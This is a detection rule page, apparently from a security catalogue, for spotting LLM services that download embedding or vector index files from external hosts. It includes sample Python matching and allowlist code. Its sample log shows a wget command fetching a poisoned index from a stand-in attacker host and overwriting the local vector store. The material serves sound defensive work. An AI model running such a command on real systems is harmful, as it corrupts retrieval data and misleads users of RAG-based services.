medium · experimental · Linux · AI/ML · Network · T1105

LLM Service Downloading Embeddings Or Index Files From External Host

Detects curl, wget, or Python processes that download files with embedding or vector index extensions from external hosts not in the OCI baseline. This pattern may indicate that the vector store is being replaced with externally sourced, potentially poisoned content.

Updated Jan 15, 2025 · Detection Engineering Team

llm · vector-embedding · linux · download · owasp-llm08

Problem Statement

Downloading embedding or vector index files from external hosts at runtime bypasses integrity controls and can introduce poisoned retrieval data that corrupts RAG-based model responses.

Sample Logs

{"timestamp":"2025-01-15T07:33:18Z","computer_name":"llm-host-02","user":"llm_svc","image":"/usr/bin/wget","command_line":"wget https://attacker.com/poisoned_index.faiss -O /opt/llm/vector/index.faiss"}
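As a rough illustration of the matching logic, the Python sketch below evaluates an event shaped like the sample log. It is not the rule's actual query. The extension list is an assumption (only .faiss appears in the sample log), the helper names are hypothetical, and the check against the baseline of known hosts is left out.

```python
import json
import posixpath
import re
from urllib.parse import urlparse

# Assumption: the rule does not enumerate extensions. Only ".faiss" comes
# from the sample log; the others are illustrative guesses.
VECTOR_EXTENSIONS = {".faiss", ".index", ".npy", ".hnsw", ".annoy"}

# Process names taken from the rule description (curl, wget, Python).
DOWNLOADER_PREFIXES = ("curl", "wget", "python")

# Loose URL matcher: stops at whitespace or a quote character.
URL_PATTERN = re.compile(r"https?://[^\s'\"]+")


def is_downloader(image):
    """True if the process image is curl, wget, or a Python interpreter."""
    name = posixpath.basename(image).lower()
    return name.startswith(DOWNLOADER_PREFIXES)


def vector_file_urls(command_line):
    """Return URLs in the command line whose path ends in a vector extension."""
    hits = []
    for url in URL_PATTERN.findall(command_line):
        extension = posixpath.splitext(urlparse(url).path.lower())[1]
        if extension in VECTOR_EXTENSIONS:
            hits.append(url)
    return hits


def matches(event):
    """Hypothetical stand-in for the rule condition, without host filtering."""
    if not is_downloader(event.get("image", "")):
        return False
    return bool(vector_file_urls(event.get("command_line", "")))


# The sample log from this page, parsed as JSON.
SAMPLE_EVENT = json.loads(
    '{"timestamp":"2025-01-15T07:33:18Z","computer_name":"llm-host-02",'
    '"user":"llm_svc","image":"/usr/bin/wget",'
    '"command_line":"wget https://attacker.com/poisoned_index.faiss '
    '-O /opt/llm/vector/index.faiss"}'
)

if __name__ == "__main__":
    print(matches(SAMPLE_EVENT))  # True
```

Matching on the URL path rather than the whole command line keeps the local output path (here /opt/llm/vector/index.faiss) from triggering a match on its own.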

Required Fields

image
command_line
user
computer_name

False Positives

  • Approved data pipeline scripts that download embedding files from HuggingFace or other approved hosts

Tuning Guidance

Add approved external embedding sources to the filter. Most production environments should not download embedding files from external hosts at runtime.
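One way to express such a filter is a host allowlist applied to the download URL. The Python sketch below is a minimal illustration under stated assumptions: the APPROVED_HOSTS set and the is_approved_host helper are hypothetical, and huggingface.co appears only because HuggingFace is named above as an example of an approved source.

```python
from urllib.parse import urlparse

# Hypothetical allowlist; replace with the hosts approved in your environment.
APPROVED_HOSTS = {"huggingface.co"}


def is_approved_host(url, approved=APPROVED_HOSTS):
    """True if the URL's host is an approved domain or one of its subdomains."""
    host = (urlparse(url).hostname or "").lower()
    # Compare on a dot boundary so "huggingface.co.attacker.com" is rejected.
    return any(host == domain or host.endswith("." + domain) for domain in approved)


if __name__ == "__main__":
    print(is_approved_host("https://huggingface.co/org/repo/index.faiss"))
    print(is_approved_host("https://attacker.com/poisoned_index.faiss"))
```

Comparing the parsed hostname, rather than searching the command line for a substring, avoids suppressing alerts for lookalike domains that merely contain an approved name.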